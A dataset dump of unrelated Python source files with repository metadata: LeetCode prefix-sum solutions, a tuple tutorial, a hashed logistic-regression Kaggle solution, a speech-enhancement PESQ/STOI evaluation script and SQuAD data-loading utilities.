# https://leetcode.com/problems/corporate-flight-bookings/discuss/328986/Python-linear-solution
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
res = [0] * (n + 2)
for booking in bookings:
start, end, seats = booking
res[start] += seats
res[end + 1] -= seats
for i in range(1, len(res)):
res[i] += res[i - 1]
# don't keep first because bookings are 1-based
# don't keep last because it's out of range
return res[1:-1]
# V1''''
# https://leetcode.com/problems/corporate-flight-bookings/discuss/328863/Python-concise-sum
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
res = [0] * n
i = cur = 0
for j, val in sorted([[i - 1, k] for i, j, k in bookings] + [[j, -k] for i, j, k in bookings]):
while i < j:
res[i] = cur
i += 1
cur += val
return res
# V1''''''
# https://zxi.mytechroad.com/blog/math/leetcode-1109-corporate-flight-bookings/
# C++
# class Solution {
# public:
# vector<int> corpFlightBookings(vector<vector<int>>& bookings, int n) {
# vector<int> ans(n + 1);
# for (const auto& b : bookings) {
# ans[b[0] - 1] += b[2];
# ans[b[1]] -= b[2];
# }
# for (int i = 1; i < n; ++i)
# ans[i] += ans[i - 1];
# ans.pop_back();
# return ans;
# }
# };
# V1''''''''
# https://blog.51cto.com/u_15344287/3646723
class Solution:
def corpFlightBookings(self, bookings: List[List[int]], n: int) -> List[int]:
lst = [0] * (n + 1)
for j, k, l in bookings:
lst[j - 1] += l
lst[k] -= l
lst.pop()
ans = []
now = 0
for i in range(len(lst)):
now += lst[i]
ans.append(now)
return ans
# V2 | [
"[email protected]"
] | |
6fa980d4dd5a9231591dcd0dfff776d63cf6e4d2 | 64530babd4336421ef28feea8e0c69fddf6ca394 | /tuple.py | 5bc07629159ff6e5ae7bbd6e389cd31caa5246fe | [] | no_license | judy1116/pythonDemo | 0e35e51da7bc82354b11e67219bfe1ba742048d7 | 1e8f3e2a48b1804a12f7d93a7477a8d3e5bdf450 | refs/heads/master | 2021-08-31T10:49:22.219034 | 2017-12-21T03:20:23 | 2017-12-21T03:20:23 | 114,954,420 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | # What is the point of an immutable tuple? Because a tuple cannot be modified, the code is safer. Prefer a tuple over a list whenever you can.
# Another kind of ordered sequence is the tuple. A tuple is very similar to a list, but once initialized it cannot be modified. For example, listing classmates' names again:
classmates = ('Michael', 'Bob', 'Tracy')
# Now the classmates tuple can no longer change, and it has no methods such as append() or insert(). The other ways of accessing elements are the same as for a list: you can use classmates[0] and classmates[-1] as usual, but you cannot assign a new element.
print(classmates[0])
t = (1, 2)
f = ()
# If you write e = (1), what gets defined is not a tuple but the number 1! Parentheses () can denote either a tuple or ordinary grouping in an expression, which is ambiguous, so Python treats them as grouping here and the result is simply 1.
# Therefore, a tuple with a single element must be written with a trailing comma to remove the ambiguity:
e = (1,)
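# Quick check of the trailing-comma rule described above (illustrative):
print(type((1)))   # <class 'int'>   -- plain parentheses are just grouping
print(type((1,)))  # <class 'tuple'> -- the comma is what makes the tuple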
#"可变的"tuple
#表面上看,tuple的元素确实变了,但其实变的不是tuple的元素,而是list的元素。tuple一开始指向的list并没有改成别的list,所以,tuple所谓的“不变”是说,tuple的每个元素,指向永远不变。即指向'a',就不能改成指向'b',指向一个list,就不能改成指向其他对象,但指向的这个list本身是可变的!
g=('a','b',['A','B'])
g[2][0]='X'
g[2][1]='Y'
print(g) | [
"[email protected]"
] | |
8da121d649ea828a915d2f8fee0f8d2f41569f13 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/120243/tradeshift-text-classification-master/src/online-model/tk7_solution.py | ffa812f783556c5f81ae943cd1fa4a0497105321 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,176 | py | '''
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2004 Sam Hocevar <[email protected]>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. You just DO WHAT THE FUCK YOU WANT TO.
'''
from datetime import datetime
from math import log, exp, sqrt
# TL; DR
# the main learning process starts at line 122
# parameters #################################################################
import sys
data_dir=sys.argv[1]
sub_dir=sys.argv[2]
train = data_dir+'train.csv' # path to training file
label = data_dir+'trainLabels.csv' # path to label file of training data
test = data_dir+'test.csv' # path to testing file
D = 2 ** 23  # number of weights used for each model; we have 32 of them
alpha = .1 # learning rate for sgd optimization
# function, generator definitions ############################################
# A. x, y generator
# INPUT:
# path: path to train.csv or test.csv
# label_path: (optional) path to trainLabels.csv
# YIELDS:
# ID: id of the instance (can also acts as instance count)
# x: a list of indices that its value is 1
# y: (if label_path is present) label value of y1 to y33
def data(path, label_path=None):
for t, line in enumerate(open(path)):
# initialize our generator
if t == 0:
# create a static x,
# so we don't have to construct a new x for every instance
            x = [0] * (146 + 13*14//2 + 1)  # 146 raw + 91 pairwise (14 choose 2) + 1; // keeps the length an int
if label_path:
label = open(label_path)
label.readline() # we don't need the headers
continue
# parse x
for m, feat in enumerate(line.rstrip().split(',')):
if m == 0:
ID = int(feat)
else:
# one-hot encode everything with hash trick
# categorical: one-hotted
# boolean: ONE-HOTTED
# numerical: ONE-HOTTED!
                # note: the built-in hash(), although fast, is not stable,
                # i.e., the same value won't always get the same hash
                # across machines/runs (a stable alternative is sketched after this generator)
x[m] = abs(hash(str(m) + '_' + feat)) % D
        row = line.rstrip().split(',')
        hash_cols = [64, 65, 61, 62, 91, 92, 142, 3, 4, 61, 34, 91, 94, 95]
        # pairwise feature crosses; a separate counter keeps the enumerate()
        # loop variable t from being clobbered
        idx = 146
        for i in range(14):
            for j in range(i+1, 14):
                idx += 1
                x[idx] = abs(hash(str(i)+'_'+str(j)+'_'+row[hash_cols[i]]+"_x_"+row[hash_cols[j]])) % D
# parse y, if provided
if label_path:
# use float() to prevent future type casting, [1:] to ignore id
y = [float(y) for y in label.readline().split(',')[1:]]
yield (ID, x, y) if label_path else (ID, x)
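# Added sketch (not part of the original solution): as noted above, the
# built-in hash() is not reproducible across machines or runs (Python 3 also
# randomizes string hashing per process). A slower but stable alternative is
# a fixed digest, e.g. with hashlib; stable_hash is a hypothetical helper
# shown for illustration only and is not used below.
import hashlib
def stable_hash(s, D):
    # md5 of the feature string, reduced modulo the weight-table size D
    return int(hashlib.md5(s.encode('utf8')).hexdigest(), 16) % D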
# B. Bounded logloss
# INPUT:
# p: our prediction
# y: real answer
# OUTPUT
# bounded logarithmic loss of p given y
def logloss(p, y):
p = max(min(p, 1. - 10e-15), 10e-15)
return -log(p) if y == 1. else -log(1. - p)
# C. Get probability estimation on x
# INPUT:
# x: features
# w: weights
# OUTPUT:
# probability of p(y = 1 | x; w)
def predict(x, w):
wTx = 0.
for i in x: # do wTx
wTx += w[i] * 1. # w[i] * x[i], but if i in x we got x[i] = 1.
return 1. / (1. + exp(-max(min(wTx, 20.), -20.))) # bounded sigmoid
# D. Update given model
# INPUT:
# alpha: learning rate
# w: weights
# n: sum of previous absolute gradients for a given feature
# this is used for adaptive learning rate
# x: feature, a list of indices
# p: prediction of our model
# y: answer
# MODIFIES:
# w: weights
# n: sum of past absolute gradients
def update(alpha, w, n, x, p, y):
for i in x:
# alpha / sqrt(n) is the adaptive learning rate
# (p - y) * x[i] is the current gradient
# note that in our case, if i in x then x[i] = 1.
n[i] += abs(p - y)
w[i] -= (p - y) * 1. * alpha / sqrt(n[i])
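# In symbols (added note): with per-example gradient g = (p - y) * x_i and
# x_i = 1 for active features, the update above is
#     n_i <- n_i + |g|
#     w_i <- w_i - g * alpha / sqrt(n_i)
# a per-feature adaptive step in the spirit of AdaGrad (accumulating |g|
# rather than g^2), so frequently updated features take smaller steps.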
# training and testing #######################################################
start = datetime.now()
# a list for range(0, 33) - 13, no need to learn y14 since it is always 0
K = [k for k in range(33) if k != 13]
# initialize our model, all 32 of them, again ignoring y14
w = [[0.] * D if k != 13 else None for k in range(33)]
n = [[0.] * D if k != 13 else None for k in range(33)]
loss = 0.
loss_y14 = -log(1. - 10**-15)  # per-sample logloss of y14 (predicted ~0, true 0); tiny but never exactly zero
for ID, x, y in data(train, label):
# get predictions and train on all labels
for k in K:
p = predict(x, w[k])
update(alpha, w[k], n[k], x, p, y[k])
loss += logloss(p, y[k]) # for progressive validation
loss += loss_y14 # the loss of y14, logloss is never zero
# print out progress, so that we know everything is working
if ID % 100000 == 0:
print(('%s\tencountered: %d\tcurrent logloss: %f' % (
datetime.now(), ID, (loss/33.)/ID)))
for ID, x, y in data(train, label):
# get predictions and train on all labels
for k in K:
p = predict(x, w[k])
update(alpha, w[k], n[k], x, p, y[k])
loss += logloss(p, y[k]) # for progressive validation
loss += loss_y14 # the loss of y14, logloss is never zero
# print out progress, so that we know everything is working
if ID % 100000 == 0:
print(('%s\tencountered: %d\tcurrent logloss: %f' % (
datetime.now(), ID, (loss/33.)/ID)))
with open(sub_dir+'./submissiontk7.csv', 'w') as outfile:
outfile.write('id_label,pred\n')
for ID, x in data(test):
for k in K:
p = predict(x, w[k])
outfile.write('%s_y%d,%s\n' % (ID, k+1, str(p)))
if k == 12:
outfile.write('%s_y14,0.0\n' % ID)
print(('Done, elapsed time: %s' % str(datetime.now() - start)))
| [
"[email protected]"
] | |
f6d7ae62aec0c8ee20db1465a48e9ad487cd7662 | 6430f1d91ca5b7a5d4c19dac26f148e746166f65 | /evaluate.py | eb8fe7db2ce94130d64f14c25b53b9538424d8fd | [] | no_license | cp917/speech_enhancement | e855a3ba82d48f4579367e792b93d81d0faf3f40 | 815c7f3a8f78344d206a58d48ce49d7e4ba657d9 | refs/heads/master | 2020-12-09T10:37:40.157443 | 2019-09-17T03:27:34 | 2019-09-17T03:27:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,931 | py | """
Summary: Calculate PESQ and overall stats of enhanced speech.
Author: Qiuqiang Kong
Created: 2017.12.22
Modified: -
"""
import argparse
import os
import csv
import numpy as np
import cPickle
import soundfile
from pypesq import pypesq
from pystoi.stoi import stoi
from prepare_data import create_folder
#import matplotlib.pyplot as plt
def plot_training_stat(args):
"""Plot training and testing loss.
Args:
workspace: str, path of workspace.
tr_snr: float, training SNR.
bgn_iter: int, plot from bgn_iter
fin_iter: int, plot finish at fin_iter
interval_iter: int, interval of files.
"""
workspace = args.workspace
tr_snr = args.tr_snr
bgn_iter = args.bgn_iter
fin_iter = args.fin_iter
interval_iter = args.interval_iter
tr_losses, te_losses, iters = [], [], []
# Load stats.
stats_dir = os.path.join(workspace, "training_stats", "%ddb" % int(tr_snr))
for iter in xrange(bgn_iter, fin_iter, interval_iter):
stats_path = os.path.join(stats_dir, "%diters.p" % iter)
dict = cPickle.load(open(stats_path, 'rb'))
tr_losses.append(dict['tr_loss'])
te_losses.append(dict['te_loss'])
iters.append(dict['iter'])
# Plot
# line_tr, = plt.plot(tr_losses, c='b', label="Train")
# line_te, = plt.plot(te_losses, c='r', label="Test")
# plt.axis([0, len(iters), 0, max(tr_losses)])
# plt.xlabel("Iterations")
# plt.ylabel("Loss")
# plt.legend(handles=[line_tr, line_te])
# plt.xticks(np.arange(len(iters)), iters)
# plt.show()
def calculate_pesq(args):
"""Calculate PESQ of all enhaced speech.
Args:
workspace: str, path of workspace.
speech_dir: str, path of clean speech.
te_snr: float, testing SNR.
"""
# Remove already existed file.
data_type = args.data_type
speech_dir = "mini_data/test_speech"
f = "{0:<16} {1:<16} {2:<16}"
print(f.format("0", "Noise", "PESQ"))
f1 = open(data_type + '_pesq_results.csv', 'w')
f1.write("%s\t%s\n"%("audio_id", "PESQ"))
    # Calculate PESQ of all enhanced speech.
if data_type=="DM":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "mixdb")
elif data_type=="IRM":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "mask_mixdb")
elif data_type=="CRN":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "crn_mixdb")
elif data_type=="PHASE":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "phase_spec_clean_mixdb")
elif data_type=="VOLUME":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "volume_mixdb")
elif data_type=="NOISE":
enh_speech_dir = os.path.join("workspace" ,'mixed_audios','spectrogram','test','mixdb')
names = os.listdir(enh_speech_dir)
for (cnt, na) in enumerate(names):
enh_path = os.path.join(enh_speech_dir, na)
enh_audio, fs = soundfile.read(enh_path)
speech_na = na.split('.')[0]
speech_path = os.path.join(speech_dir, "%s.WAV" % speech_na)
speech_audio, fs = soundfile.read(speech_path)
#alpha = 1. / np.max(np.abs(speech_audio))
#speech_audio *=alpha
pesq_ = pypesq(16000, speech_audio, enh_audio, 'wb')
print(f.format(cnt, na, pesq_))
f1.write("%s\t%f\n"%(na, pesq_))
# Call executable PESQ tool.
#cmd = ' '.join(["./pesq", speech_path, enh_path, "+16000"])
#os.system(cmd)
os.system("mv %s_pesq_results.csv ./pesq_result/%s_pesq_results.csv"%(data_type, data_type))
def get_stats(args):
"""Calculate stats of PESQ.
"""
data_type = args.data_type
pesq_path = "./pesq_result/"+ data_type+ "_pesq_results.csv"
with open(pesq_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
lis = list(reader)
pesq_dict = {}
for i1 in xrange(1, len(lis) - 1):
li = lis[i1]
na = li[0]
pesq = float(li[1])
noise_type = na.split('.')[1]
if noise_type not in pesq_dict.keys():
pesq_dict[noise_type] = [pesq]
else:
pesq_dict[noise_type].append(pesq)
out_csv_path ='./pesq_result/'+ data_type +'_pesq_differentnoise.csv'
csv_file = open(out_csv_path, 'w')
avg_list, std_list = [], []
f = "{0:<16} {1:<16}"
print(f.format("Noise", "PESQ"))
csv_file.write("%s\t%s\n"%("Noise", "PESQ"))
print("---------------------------------")
csv_file.write("----------------\t-----------------\n")
for noise_type in pesq_dict.keys():
pesqs = pesq_dict[noise_type]
avg_pesq = np.mean(pesqs)
std_pesq = np.std(pesqs)
avg_list.append(avg_pesq)
std_list.append(std_pesq)
print(f.format(noise_type, "%.2f +- %.2f" % (avg_pesq, std_pesq)))
csv_file.write("%s\t%s\n"%(noise_type, "%.2f +- %.2f" % (avg_pesq, std_pesq)))
print("---------------------------------")
csv_file.write("----------------\t-----------------\n")
print(f.format("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list))))
csv_file.write("%s\t%s\n"%("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list))))
csv_file.close()
def get_snr_stats(args):
data_type = args.data_type
pesq_path = os.path.join("pesq_result", data_type + "_pesq_results.csv")
with open(pesq_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
pesq_lis = list(reader)
pesq_lis[0].append("SNR")
pesq_title = pesq_lis[0]
pesq_lis = pesq_lis[:-1]
csv_path = os.path.join("workspace", "mixture_csvs", "test_1hour_even.csv")
with open(csv_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
csv_lis = list(reader)
count = 0
for csv_name in csv_lis[1:]:
if data_type=="NOISE":
csv_na = csv_name[0].split(".")[0] + "." + csv_name[1].split(".")[0]+ "."+csv_name[-1] + "db.wav"
else:
csv_na = csv_name[0].split(".")[0] + "." + csv_name[1].split(".")[0]+ "."+csv_name[-1] + "db.enh.wav"
for pesq_name in pesq_lis[1:]:
if csv_na == pesq_name[0]:
count+=1
pesq_name.append(csv_name[-1])
break
pesq_dict = {}
for i1 in xrange(1, len(pesq_lis)):
li = pesq_lis[i1]
na = li[0]
pesq = float(li[1][0:4])
snr = float(li[-1])
snr_key = snr
if snr_key not in pesq_dict.keys():
pesq_dict[snr_key] = [pesq]
else:
pesq_dict[snr_key].append(pesq)
out_csv_path = os.path.join( "pesq_result", data_type + "_snr_results.csv")
create_folder(os.path.dirname(out_csv_path))
csv_file = open(out_csv_path, 'w')
avg_list, std_list = [], []
sample_sum = 0
f = "{0:<16} {1:<16} {2:<16}"
print(f.format("SNR", "PESQ", "SAMPLE_NUM"))
csv_file.write("%s\t%s\t%s\n"%("SNR", "PESQ", "SAMPLE_NUM"))
csv_file.flush()
print("---------------------------------")
for snr_type in sorted(pesq_dict.keys()):
pesqs = pesq_dict[snr_type]
sample_num = len(pesqs)
sample_sum+=sample_num
avg_pesq = np.mean(pesqs)
std_pesq = np.std(pesqs)
avg_list.append(avg_pesq)
std_list.append(std_pesq)
print(f.format(snr_type, "%.2f +- %.2f" % (avg_pesq, std_pesq), sample_num))
csv_file.write("%s\t%s\t%s\n"%(snr_type, "%.2f +- %.2f" % (avg_pesq, std_pesq), sample_num))
csv_file.flush()
print("---------------------------------")
print(f.format("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list)), sample_sum))
csv_file.write("%s\t%s\t%s\n"%("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list)), "%d"%sample_sum))
csv_file.close()
def calculate_stoi(args):
workspace = "workspace"
speech_dir = "mini_data/test_speech"
# Calculate PESQ of all enhaced speech.
enh_speech_dir = os.path.join(workspace, "enh_wavs", "test", "mixdb")
#enh_speech_dir = "/data00/wangjinchao/sednn-master/mixture2clean_dnn/workspace/mixed_audios/spectrogram/test/mixdb"
# enh_speech_dir = os.path.join(workspace ,'mixed_audios','spectrogram','test','mixdb')
names = os.listdir(enh_speech_dir)
f = open("IRM_stoi.txt", "w")
f.write("%s\t%s\n"%("speech_id", "stoi"))
f.flush()
for (cnt, na) in enumerate(names):
print(cnt, na)
enh_path = os.path.join(enh_speech_dir, na)
speech_na = na.split('.')[0]
speech_path = os.path.join(speech_dir, "%s.WAV" % speech_na)
        speech_audio, fs = soundfile.read(speech_path)  # read_audio was undefined here; files are assumed to already be 16 kHz
        enhance_audio, fs = soundfile.read(enh_path)
if len(speech_audio)>len(enhance_audio):
speech_audio = speech_audio[:len(enhance_audio)]
else:
enhance_audio = enhance_audio[:len(speech_audio)]
stoi_value = stoi(speech_audio, enhance_audio, fs, extended = False)
f.write("%s\t%f\n"%(na, stoi_value))
f.flush()
f.close()
def get_stoi_stats(args):
stoi_path = "./stoi_result/IRM_stoi.txt"
with open(stoi_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
lis = list(reader)
stoi_dict = {}
for i1 in xrange(1, len(lis) - 1):
li = lis[i1]
na = li[0]
stoi = float(li[1])
noise_type = na.split('.')[1]
if noise_type not in stoi_dict.keys():
stoi_dict[noise_type] = [stoi]
else:
stoi_dict[noise_type].append(stoi)
#out_csv_path ='./stoi_result/gvdm_enhance.csv'
#csv_file = open(out_csv_path, 'w')
avg_list, std_list = [], []
f = "{0:<16} {1:<16}"
print(f.format("Noise", "STOI"))
#csv_file.write("%s\t%s\n"%("Noise", "stoi"))
print("---------------------------------")
#csv_file.write("----------------\t-----------------\n")
for noise_type in stoi_dict.keys():
stois = stoi_dict[noise_type]
avg_stoi = np.mean(stois)
std_stoi = np.std(stois)
avg_list.append(avg_stoi)
std_list.append(std_stoi)
print(f.format(noise_type, "%.5f +- %.5f" % (avg_stoi, std_stoi)))
#csv_file.write("%s\t%s\n"%(noise_type, "%.2f +- %.2f" % (avg_stoi, std_stoi)))
print("---------------------------------")
#csv_file.write("----------------\t-----------------\n")
print(f.format("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list))))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest='mode')
parser_plot_training_stat = subparsers.add_parser('plot_training_stat')
parser_plot_training_stat.add_argument('--workspace', type=str, required=True)
parser_plot_training_stat.add_argument('--tr_snr', type=float, required=True)
parser_plot_training_stat.add_argument('--bgn_iter', type=int, required=True)
parser_plot_training_stat.add_argument('--fin_iter', type=int, required=True)
parser_plot_training_stat.add_argument('--interval_iter', type=int, required=True)
parser_calculate_pesq = subparsers.add_parser('calculate_pesq')
parser_calculate_pesq.add_argument('--data_type', type=str, required=True)
parser_get_stats = subparsers.add_parser('get_stats')
parser_get_stats.add_argument('--data_type', type=str, required=True)
parser_get_snr_stats = subparsers.add_parser('get_snr_stats')
parser_get_snr_stats.add_argument('--data_type', type=str, required=True)
args = parser.parse_args()
if args.mode == 'plot_training_stat':
plot_training_stat(args)
elif args.mode == 'calculate_pesq':
calculate_pesq(args)
elif args.mode == 'get_stats':
get_stats(args)
elif args.mode == 'get_snr_stats':
get_snr_stats(args)
else:
raise Exception("Error!")
| [
"[email protected]"
] | |
a23451e561311fe8fd81476b96702f9bc83a0710 | aa18fb4bb13b6499ae9b1f669758d0ea326c1921 | /util.py | c901283bc804ccdb170cc460fd329c3edf4b2eef | [] | no_license | kaushikData/DoCAI | 8d144a1a6dc2adf5429389ee83aacae4498ab7a5 | e48ffbf9545f84f2426e5154ff626e94ae33f62f | refs/heads/master | 2020-12-18T12:58:28.280599 | 2020-01-24T11:21:57 | 2020-01-24T11:21:57 | 235,391,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,395 | py |
import logging
import os
import queue
import re
import shutil
import string
import torch
import torch.nn.functional as F
import torch.utils.data as data
import tqdm
import numpy as np
import ujson as json
from collections import Counter
class SQuAD(data.Dataset):
"""Stanford Question Answering Dataset (SQuAD).
Each item in the dataset is a tuple with the following entries (in order):
- context_idxs: Indices of the words in the context.
Shape (context_len,).
- context_char_idxs: Indices of the characters in the context.
Shape (context_len, max_word_len).
- question_idxs: Indices of the words in the question.
Shape (question_len,).
- question_char_idxs: Indices of the characters in the question.
Shape (question_len, max_word_len).
- y1: Index of word in the context where the answer begins.
-1 if no answer.
- y2: Index of word in the context where the answer ends.
-1 if no answer.
- id: ID of the example.
Args:
data_path (str): Path to .npz file containing pre-processed dataset.
use_v2 (bool): Whether to use SQuAD 2.0 questions. Otherwise only use SQuAD 1.1.
"""
def __init__(self, data_path, use_v2=True):
super(SQuAD, self).__init__()
dataset = np.load(data_path)
self.context_idxs = torch.from_numpy(dataset['context_idxs']).long()
self.context_char_idxs = torch.from_numpy(dataset['context_char_idxs']).long()
self.question_idxs = torch.from_numpy(dataset['ques_idxs']).long()
self.question_char_idxs = torch.from_numpy(dataset['ques_char_idxs']).long()
self.y1s = torch.from_numpy(dataset['y1s']).long()
self.y2s = torch.from_numpy(dataset['y2s']).long()
if use_v2:
# SQuAD 2.0: Use index 0 for no-answer token (token 1 = OOV)
batch_size, c_len, w_len = self.context_char_idxs.size()
ones = torch.ones((batch_size, 1), dtype=torch.int64)
self.context_idxs = torch.cat((ones, self.context_idxs), dim=1)
self.question_idxs = torch.cat((ones, self.question_idxs), dim=1)
ones = torch.ones((batch_size, 1, w_len), dtype=torch.int64)
self.context_char_idxs = torch.cat((ones, self.context_char_idxs), dim=1)
self.question_char_idxs = torch.cat((ones, self.question_char_idxs), dim=1)
self.y1s += 1
self.y2s += 1
# SQuAD 1.1: Ignore no-answer examples
self.ids = torch.from_numpy(dataset['ids']).long()
self.valid_idxs = [idx for idx in range(len(self.ids))
if use_v2 or self.y1s[idx].item() >= 0]
def __getitem__(self, idx):
idx = self.valid_idxs[idx]
example = (self.context_idxs[idx],
self.context_char_idxs[idx],
self.question_idxs[idx],
self.question_char_idxs[idx],
self.y1s[idx],
self.y2s[idx],
self.ids[idx])
return example
def __len__(self):
return len(self.valid_idxs)
def collate_fn(examples):
"""Create batch tensors from a list of individual examples returned
by `SQuAD.__getitem__`. Merge examples of different length by padding
all examples to the maximum length in the batch.
Args:
examples (list): List of tuples of the form (context_idxs, context_char_idxs,
question_idxs, question_char_idxs, y1s, y2s, ids).
Returns:
examples (tuple): Tuple of tensors (context_idxs, context_char_idxs, question_idxs,
question_char_idxs, y1s, y2s, ids). All of shape (batch_size, ...), where
the remaining dimensions are the maximum length of examples in the input.
Adapted from:
https://github.com/yunjey/seq2seq-dataloader
"""
def merge_0d(scalars, dtype=torch.int64):
return torch.tensor(scalars, dtype=dtype)
def merge_1d(arrays, dtype=torch.int64, pad_value=0):
lengths = [(a != pad_value).sum() for a in arrays]
padded = torch.zeros(len(arrays), max(lengths), dtype=dtype)
for i, seq in enumerate(arrays):
end = lengths[i]
padded[i, :end] = seq[:end]
return padded
def merge_2d(matrices, dtype=torch.int64, pad_value=0):
heights = [(m.sum(1) != pad_value).sum() for m in matrices]
widths = [(m.sum(0) != pad_value).sum() for m in matrices]
padded = torch.zeros(len(matrices), max(heights), max(widths), dtype=dtype)
for i, seq in enumerate(matrices):
height, width = heights[i], widths[i]
padded[i, :height, :width] = seq[:height, :width]
return padded
# Group by tensor type
context_idxs, context_char_idxs, \
question_idxs, question_char_idxs, \
y1s, y2s, ids = zip(*examples)
# Merge into batch tensors
context_idxs = merge_1d(context_idxs)
context_char_idxs = merge_2d(context_char_idxs)
question_idxs = merge_1d(question_idxs)
question_char_idxs = merge_2d(question_char_idxs)
y1s = merge_0d(y1s)
y2s = merge_0d(y2s)
ids = merge_0d(ids)
return (context_idxs, context_char_idxs,
question_idxs, question_char_idxs,
y1s, y2s, ids)
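# Illustrative usage (added; the path and sizes are invented): wiring the
# dataset and this collate function into a PyTorch DataLoader.
#
#   dataset = SQuAD('data/train.npz', use_v2=True)
#   loader = data.DataLoader(dataset, batch_size=64, shuffle=True,
#                            collate_fn=collate_fn)
#   for cw_idxs, cc_idxs, qw_idxs, qc_idxs, y1, y2, ids in loader:
#       ...  # one padded batch per iteration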
class AverageMeter:
"""Keep track of average values over time.
Adapted from:
> https://github.com/pytorch/examples/blob/master/imagenet/main.py
"""
def __init__(self):
self.avg = 0
self.sum = 0
self.count = 0
def reset(self):
"""Reset meter."""
self.__init__()
def update(self, val, num_samples=1):
"""Update meter with new value `val`, the average of `num` samples.
Args:
val (float): Average value to update the meter with.
num_samples (int): Number of samples that were averaged to
produce `val`.
"""
self.count += num_samples
self.sum += val * num_samples
self.avg = self.sum / self.count
class EMA:
"""Exponential moving average of model parameters.
Args:
model (torch.nn.Module): Model with parameters whose EMA will be kept.
decay (float): Decay rate for exponential moving average.
"""
def __init__(self, model, decay):
self.decay = decay
self.shadow = {}
self.original = {}
# Register model parameters
for name, param in model.named_parameters():
if param.requires_grad:
self.shadow[name] = param.data.clone()
def __call__(self, model, num_updates):
decay = min(self.decay, (1.0 + num_updates) / (10.0 + num_updates))
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
new_average = \
(1.0 - decay) * param.data + decay * self.shadow[name]
self.shadow[name] = new_average.clone()
def assign(self, model):
"""Assign exponential moving average of parameter values to the
respective parameters.
Args:
model (torch.nn.Module): Model to assign parameter values.
"""
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
self.original[name] = param.data.clone()
param.data = self.shadow[name]
def resume(self, model):
"""Restore original parameters to a model. That is, put back
the values that were in each parameter at the last call to `assign`.
Args:
model (torch.nn.Module): Model to assign parameter values.
"""
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
param.data = self.original[name]
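# Illustrative usage (added; names are invented):
#
#   ema = EMA(model, decay=0.999)
#   for step, batch in enumerate(loader):
#       ...                    # forward / backward / optimizer.step()
#       ema(model, step)       # update the shadow (averaged) weights
#   ema.assign(model)          # swap in averaged weights for evaluation
#   ...                        # run validation
#   ema.resume(model)          # restore raw weights before more training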
class CheckpointSaver:
"""Class to save and load model checkpoints.
Save the best checkpoints as measured by a metric value passed into the
`save` method. Overwrite checkpoints with better checkpoints once
`max_checkpoints` have been saved.
Args:
save_dir (str): Directory to save checkpoints.
max_checkpoints (int): Maximum number of checkpoints to keep before
overwriting old ones.
metric_name (str): Name of metric used to determine best model.
maximize_metric (bool): If true, best checkpoint is that which maximizes
the metric value passed in via `save`. Otherwise, best checkpoint
minimizes the metric.
log (logging.Logger): Optional logger for printing information.
"""
def __init__(self, save_dir, max_checkpoints, metric_name,
maximize_metric=False, log=None):
super(CheckpointSaver, self).__init__()
self.save_dir = save_dir
self.max_checkpoints = max_checkpoints
self.metric_name = metric_name
self.maximize_metric = maximize_metric
self.best_val = None
self.ckpt_paths = queue.PriorityQueue()
self.log = log
self._print('Saver will {}imize {}...'
.format('max' if maximize_metric else 'min', metric_name))
def is_best(self, metric_val):
"""Check whether `metric_val` is the best seen so far.
Args:
metric_val (float): Metric value to compare to prior checkpoints.
"""
if metric_val is None:
# No metric reported
return False
if self.best_val is None:
# No checkpoint saved yet
return True
return ((self.maximize_metric and self.best_val < metric_val)
or (not self.maximize_metric and self.best_val > metric_val))
def _print(self, message):
"""Print a message if logging is enabled."""
if self.log is not None:
self.log.info(message)
def save(self, step, model, metric_val, device):
"""Save model parameters to disk.
Args:
step (int): Total number of examples seen during training so far.
model (torch.nn.DataParallel): Model to save.
metric_val (float): Determines whether checkpoint is best so far.
device (torch.device): Device where model resides.
"""
ckpt_dict = {
'model_name': model.__class__.__name__,
'model_state': model.cpu().state_dict(),
'step': step
}
model.to(device)
checkpoint_path = os.path.join(self.save_dir,
'step_{}.pth.tar'.format(step))
torch.save(ckpt_dict, checkpoint_path)
self._print('Saved checkpoint: {}'.format(checkpoint_path))
if self.is_best(metric_val):
# Save the best model
self.best_val = metric_val
best_path = os.path.join(self.save_dir, 'best.pth.tar')
shutil.copy(checkpoint_path, best_path)
self._print('New best checkpoint at step {}...'.format(step))
# Add checkpoint path to priority queue (lowest priority removed first)
if self.maximize_metric:
priority_order = metric_val
else:
priority_order = -metric_val
self.ckpt_paths.put((priority_order, checkpoint_path))
# Remove a checkpoint if more than max_checkpoints have been saved
